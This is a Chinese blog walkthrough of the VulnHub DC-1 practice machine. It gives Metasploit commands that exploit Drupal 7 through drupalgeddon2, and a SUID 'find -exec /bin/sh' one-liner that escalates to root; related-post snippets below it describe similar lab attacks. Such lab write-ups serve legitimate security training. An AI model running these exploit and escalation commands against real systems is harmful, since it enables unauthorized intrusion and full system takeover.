Vulnhub - DC-1

已于 2024-03-14 03:31:34 修改
阅读量369 收藏 3
点赞数 4
分类专栏: Vulnhub靶机 文章标签: Vulnhub DC-1 Vulnhub-DC1 SUID
于 2024-03-14 02:19:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/136695941
版权

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

DC-1 靶机下载地址:DC: 1 ~ VulnHub

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。

访问80端口是一个Drupal的登录页面。Wappalyzer显示CMS为Drupal 7,编程语言为PHP,操作系统为Debian。

0x02 Web漏洞利用 - drupalgeddon2

MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。

msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.196.137
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rport 80
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run

0x03 权限提升 - SUID

上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。

辅助项目下载地址:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

检测到可利用的SUID文件/usr/bin/find 

查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。

/usr/bin/find . -exec '/bin/sh' \;

SUID提权成功,拿到root权限和最终flag。

Ch4ser
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-1靶场详解
苏生要努力
03-12 2836
DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/
VulhubDC-1
Lorezon的博客
04-13 338
发现DC实验室都挺好玩的,就拿来玩玩,顺便记录下。 扫描主机地址: 然后nmap扫描 看到有80端口,访问。 看到是Drupal,上神器msf。 有7个可用,经测试exploit/multi/http/drupal_drupageddon模块可以反弹meterpreter。 设置好options之后开始攻击。 之后信息收集一波。 权限不是root,需要提权。 进入shell模式吧。 ls一下...
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4060
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
VulnHubDC-1
qq_45434762的博客
03-21 834
先进行一个粗糙的端口扫描首先我们对靶机所开放的端口进行扫描,发现有22,80,111端口开放Flag1既然开放了80端口,进去看看发现是Dupal CMS没有什么想法,现在MSF中搜一...
Vulnhub-DC-1
KAKA的博客
06-04 889
配置信息: 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机DC1 (VirtualBox) IP:192.168.67.200 攻机:Kali (Local) IP:192.168.67.109 目标:获取5个flag 开始游戏: 扫描整个网段获取目标IP地址: nmap -sn 192.168.67.0/24 获取目标IP地址:192.168.67.200 扫描目标信息: nmap-A -p-1...
[Vulnhub] DC-1
weixin_63231007的博客
07-06 702
目录信息搜集msf--Drupal漏洞利用SUID提权Drupal使用CVE2014-3704 添加管理员账号下载地址:DC: 1 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ip靶机ip:192.168.236.137nmap -A 192.168.236.137 扫描一下靶机开放哪些服务 访问 靶机ip 发现是用Drupal搭建的网页 他是存在一些漏洞可以被利用的。我们之前在Lampiao 靶机中进行了msf--Drupal漏洞利用。我们这里打开msfconsol
VulnHub_DC靶机系列(dc-1)
Zlirving_的博客
04-29 649
  由于是学生党,只除了网上挖洞以外,看来只能自己搭环境或者网上下载靶机来做实验。 虽然与真实场景相差很大,但是也是一种提高实战能力的途径之一。   X00靶机环境 接下来用DC-1靶机做渗透的一个实验及记录 先在VulnHub下载dc-1靶机(最好使用Virtualbox,避免卡顿) 下载地址:https://www.vulnhub.com/entry/dc-1-1,292...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开在7744端口上,使用爆破得到的账号密码进行登录,tom登陆成功,在tom主目录下找到flag3 绕过tom的rbash限制,切换到jerry用户,在主目录发现flag4 使用jerry用户通过git提权,进入root目录找到final_flag
复现DC-1靶机.pdf
03-22
复现DC-1靶机.pdf
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub】之Nagini
zg_111的博客
04-13 1364
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
Vulnhub靶机:hacksudo-Thor
qq_48904485的博客
02-09 945
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:hacksudo-Thor(10.0.2.49)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/hacksudo/hacksudo—Thor.zip。
VulnHub narak
weixin_45682839的博客
10-21 1116
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 598
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值